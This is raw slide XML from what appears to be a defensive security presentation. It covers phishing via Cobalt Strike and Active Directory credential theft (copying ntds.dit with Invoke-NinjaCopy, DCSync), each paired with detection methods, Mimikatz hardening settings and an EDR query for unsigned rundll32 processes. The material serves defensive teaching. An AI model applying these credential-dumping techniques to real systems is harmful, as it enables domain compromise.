            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>was the most common attack vector (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>96%)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Title 9"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Okay, lets talk stats</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Verizon Data Breach Investigations Report (DBIR) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="843988" y="3567135"/>
            <a:ext cx="3060192" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D685AA-38C1-4079-8F30-7AC754CADE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4321980" y="6622861"/>
            <a:ext cx="4572000" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://www.cobaltstrike.com/downloads/csmanual311.pdf </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1429F72-4684-434F-98C7-0D89F7D74188}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479469" y="3828745"/>
            <a:ext cx="3215811" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send Phish via Cobalt-Strike</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Target clicks &amp; or goes to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>EvilSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> to execute malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Then Target calls Cobalt-Strike server waiting for Adversary procedures!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4088863" y="3527859"/>
            <a:ext cx="4676304" cy="2885231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3819347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47744" y="1184489"/>
            <a:ext cx="4963218" cy="1676634"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kansa (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>moduler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://github.com/davehull/Kansa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GRR (Agent)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>https://grr-doc.readthedocs.io/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HELK (Analytics)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>https://github.com/Cyb3rWard0g/HELK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BLUE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047744" y="4855997"/>
            <a:ext cx="4963218" cy="1771897"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4047744" y="2861123"/>
            <a:ext cx="4963218" cy="1994874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="973327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E5384D-F62F-406E-9898-B81E4B637D57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-NinjaCopy.ps1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Copy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> database along with SYSTEM HIV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: PowerShellv5 Script Block Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (Empire)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https://github.com/shellster/DCSYNCMonitor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HaveIBeenPWND</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ntds.dit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ntlm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hashes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C84C0257-5F0A-4DC5-8BD9-5730933C1ABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Get the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C79E78A8-819E-4867-AAC2-0C557B86CE93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What about Active Directory? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0ACD818-1BB5-41E8-B16C-1EBE67A39783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217626" y="6130325"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3060184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59305" y="2141838"/>
            <a:ext cx="8197114" cy="4173617"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the Registry!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Reversible Encryption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable LM and NTLM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disable Credential Caching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LSA Protection Against Connection of Third-Party Modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wdigest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent the use of saved passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Credential Guard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(Win10 Enterprise/srvr2016)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protected Users Security Group </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0"/>
              <a:t>(Windows Server 2012 R2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent Getting Debug Privileges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>disable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1"/>
              <a:t>SeDebugPrivilege</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>. You can do it using GPO (local or domain one). Go to Computer Configuration -&gt; Windows Settings -&gt; Security Settings -&gt; Local Policies -&gt; User Rights Assignment and enable the policy Debug Program.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Mimikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6225571" y="6315455"/>
            <a:ext cx="2630848" cy="504895"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969401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Detect Cobalt Strike Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://blog.jpcert.or.jp/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB pipes from workstation to workstations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Meterpreter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	- rundll32.exe process , Poker ports, Network analysis</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EDRs.  Childproc_name:”rundll32.exe” AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>digsig_result:”Unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>path:c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>\windows\*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/countercept/memory-carving-scripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Fileless</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Detections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{019F89FB-7212-4986-B965-8242333CB935}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6217626" y="6130325"/>
            <a:ext cx="2638793" cy="590632"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="490054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DB527B-F40C-4A2B-82FD-F9400B4A863E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520700" y="2320239"/>
            <a:ext cx="8335719" cy="2498341"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
